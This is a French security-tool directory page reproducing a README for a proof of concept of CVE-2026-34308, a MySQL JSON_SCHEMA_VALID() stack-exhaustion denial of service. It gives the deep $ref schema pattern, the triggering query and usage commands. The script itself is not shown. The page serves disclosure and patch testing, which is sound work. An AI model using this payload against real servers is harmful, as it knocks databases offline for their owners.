Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-34308 — Preuve de concept pour CVE-2026-34308, une vulnérabilité de déni de service du composant JSON de MySQL Server. Démontre l'épuisement de la pile via des chaînes $ref profondes dans JSON_SCHEMA_VALID(), provoquant un crash du serveur. Inclut un script PoC en Python et une analyse technique. | Kitploit
Outils/GitHubGitHub/joakimbulow/cve-2026-34308
Analyse des VulnérabilitésExploitationTests d'IntrusionSécurité des Bases de Données
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Voir le dépôt
33il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Preuve de concept pour CVE-2026-34308, une vulnérabilité de déni de service du composant JSON de MySQL Server. Démontre l'épuisement de la pile via des chaînes $ref profondes dans JSON_SCHEMA_VALID(), provoquant un crash du serveur. Inclut un script PoC en Python et une analyse technique.

Partager

CVE-2026-34308 : MySQL Server (composant JSON) déni de service

Bulletin officiel du fournisseur : Oracle Critical Patch Update Advisory — April 2026.

Résumé (d'après la CVE publiée)

Vulnérabilité dans Oracle MySQL Server (composant : Server : JSON).

Versions concernées prises en charge : 8.0.0–8.0.45, 8.4.0–8.4.8 et 9.0.0–9.6.0.

La vulnérabilité permet à un utilisateur à faibles privilèges de faire planter le serveur MySQL.

Score de base CVSS 3.1 : 6.5 (impact sur la disponibilité uniquement)
Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Analyse technique complémentaire (ne fait pas partie du texte de la CVE)

Mécanisme observé : Récursion profonde lorsque MySQL évalue JSON_SCHEMA_VALID() sur un schéma JSON contenant une longue chaîne linéaire de pointeurs $ref, sans limite de profondeur effective lors de la compilation/validation du schéma — entraînant un épuisement de la pile et un blocage ou un plantage reproductible.

Chaîne d'appel (conceptuelle) :

Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → validation interne du schéma JSON → résolution répétée de $ref
  → épuisement de la pile → blocage / plantage

Privilèges requis

Pour cette preuve de concept, n'importe quel compte MySQL authentifié suffit : accordez uniquement USAGE sur *.* (le privilège minimal de MySQL — capacité à se connecter — sans SELECT, accès aux tables ou rôles d'administration). Si l'utilisateur peut ouvrir une session et exécuter SELECT JSON_SCHEMA_VALID(...), il peut déclencher la condition.


Preuve de concept

Script PoC : poc_schema_dos.py

Construit un schéma JSON avec une chaîne linéaire de $ref (exemple de profondeur 1200) :

{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

Envoyé à MySQL sous la forme : SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

Lors des tests sur des versions vulnérables, il a été observé que cela faisait planter le serveur en environ une seconde (le délai exact dépend du matériel, des options de compilation et de la profondeur du schéma).

Utilisation

python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Pour tester un compte à faibles privilèges :

CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Puis : python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (vecteur officiel)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N : Accessible depuis le réseau
  • AC:L : Complexité d'attaque faible
  • PR:L : Faibles privilèges requis
  • UI:N : Aucune interaction utilisateur
  • S:U : Périmètre inchangé
  • C:N / I:N : Aucun impact sur la confidentialité ou l'intégrité
  • A:H : Impact élevé sur la disponibilité (blocage / plantage reproductible / déni de service)

Fichiers

  • poc_schema_dos.py : Script de preuve de concept
  • README.md : Ce fichier
Télécharger l’outil